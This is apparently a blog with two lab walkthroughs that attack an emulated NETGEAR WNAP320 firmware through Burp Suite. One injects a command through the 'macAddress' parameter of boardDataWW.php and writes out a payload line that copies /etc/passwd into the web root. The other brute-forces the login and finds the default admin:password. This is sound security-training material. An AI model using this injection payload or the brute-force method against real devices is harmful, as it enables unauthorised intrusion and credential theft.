AdSense
Tuesday, May 2, 2017
3 - Command Injection with Burp for NETGEAR router emulated firmware
COMMAND INJECTION WITH BURP FOR NETGAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
1 - Introduction
- This exercise is based on the Command Injection attack for NetGear devices registered here:
http://firmware.re/vulns/acsa-2015-001.php
- The vulnerability affects a great range of NetGear products, including the router WNAP320:
- One of the affected scripts is called boardDataWW.php, that will be analyzed for the purpose of attacking it through a Command Injection, sending a crafted input taking advantage of the lack of sanitization:
- The vulnerable section of the script uses an insecure call to PHP function exec(), accepting any type of input for the parameter 'macAddress':
2 - Setting up the lab
- Unzipping and decompressing the firmware of the NetGear router:
- Extracting the .squashfs file:
- A new folder is extracted:
- Inside, we can find the whole root file system of the firmware, ready to be analyzed:
3 - Analyzing the vulnerable PHP script
- First, let's try to locate the vulnerable script boardDataWW.php, using the command locate:
- Opening boardDataWW.php we find the call to the PHP function exec():
- The parameter 'macAddress' is passed without further sanitization about the standard MAC address format:
- Let's see how exec() works:
4 - Intercepting with Burp
- Once the firmware emulated is available (as done in previous exercise):
- Going to the affected script:
- Enabling the proxy at the browser:
- Launching Burp:
- Enabling Burp to intercept Client requests and Server responses:
- Sending a fake MAC address:
- The message is intercepted:
5 - Launching the attack
- Sending the request to the Repeater:
- Now, let's try to craft the MAC address input so that the content of /etc/passwd is leaked to a file located into the root of the web page:
cp /etc/passwd /home/www/passwd # from here it is a comment
- Clicking Go and trying to access passwd from the browser:
- The file passwd is open and saved:
- The content of /etc/passwd has been leaked, so the attack is successful:
- Also, because Burp has been enabled to intercept the Server responses, the whole content is displayed:
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device.
2 - Cracking Authentication with Burp for NETGEAR router emulated firmware
CRACKING AUTHENTICATION WITH BURP FOR NETGEAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
- This exercise is based in a previous emulation of Netgear firmware:
- Downloading the free edition of Burp Suite in its .JAR file version:
https://portswigger.net/burp/freedownload
- The .JAR file is downloaded:
- Launching the application:
- After accepting all the default options for Burp, let's ensure that the proxy is listening locally (127.0.0.1) on port 8080:
- Also, let's configure Burp so that the interception applies for both the Client requests and the Server responses:
- Now, it is time to enable the proxy at the Firefox browser:
- Let's introduce some fake credentials, like for instance Username:Password
- Burp intercepts and displays the fake credentials:
- Looking into the tab "HTTP history", right clicking the request and choosing the option "Send to Intruder":
- The attack target is the known one (Firmware emulation with 192.168.0.100 and port 80):
- The attack consists on using two payload lists, the first one for the username and the second one for the password:
- Because this is a simple example, let's provide just 10 possible usernames and 10 possible passwords, totally 10x10 = 100 possible requests.
- For the username (list of 10):
- For the passwords (list of 10):
- As said before, in this simple case the total Request count is 100 (10x10):
- However, in a real scenario case, and using the Pro version of Burpsuite, large wordlist text files could be provided. Of course, trying many possible combinations would take a longer time to perform the attack:
- Starting the attack:
- It is noticeable that the only trial (number 3) with a status 200 OK and different length (313) corresponds to admin:password, what are the default credentials for the NetGear device, meaning that the attack is successful.
- Also, the 3th trial yields a loginok response message:
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device.
Subscribe to:
Posts (Atom)